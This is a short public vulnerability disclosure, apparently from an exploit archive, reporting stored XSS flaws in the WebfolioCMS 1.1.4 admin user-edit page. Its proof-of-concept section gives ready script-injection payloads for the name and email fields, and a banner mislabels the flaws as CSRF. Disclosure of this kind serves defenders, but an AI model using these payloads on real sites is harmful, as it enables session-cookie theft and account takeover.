WebfolioCMS <= 1.1.4 Multiple XSS



EKU-ID: 1599 CVE: OSVDB-ID:
Author: Ivano Binetti Published: 2012-03-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title    : WebfolioCMS <= 1.1.4 Multiple XSS 
# Date             : 07-03-2012
# Author           : Ivano Binetti (http://www.ivanobinetti.com)
# Software link    : http://sourceforge.net/projects/webfolio-cms/files/WebfolioCMS-1.1.4.zip/download
# Vendor site      : http://webfolio-cms.sourceforge.net/
# Version          : 1.1.4 and lower 
# Tested on        : Debian Squeeze (6.0) 
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/webfolio-114-multiple-xss.html
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[CSRF Vulnerabilities by Ivano Binetti]-----------------------------------------------+

Summary
1)Introduction
2)Vulnerabilities Description
3)POC
 
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Webfolio CMS "is a free, open-source, customized content management system, whose main purpose is creation of web sites for 
presenting someone's work, and portfolio-like websites".

2)Vulnerabilities Description
WebfolioCMS 1.1.4 (and lower) is prone to multiple XSS vulnerabilities in "webfolio/admin/users/edit/<used_id>" pages 
- where <used_id> = 1....n - due to an improper input sanitization.

3)POC
To exploit "First name" and "Last name" fields: 
<script>alert(document.cookie)</script> 

To exploit "Email (required)" field: 
email@email.com"><script>alert(document.cookie)</script> 
 
+--------------------------------------------------------------------------------------------------------------------------------+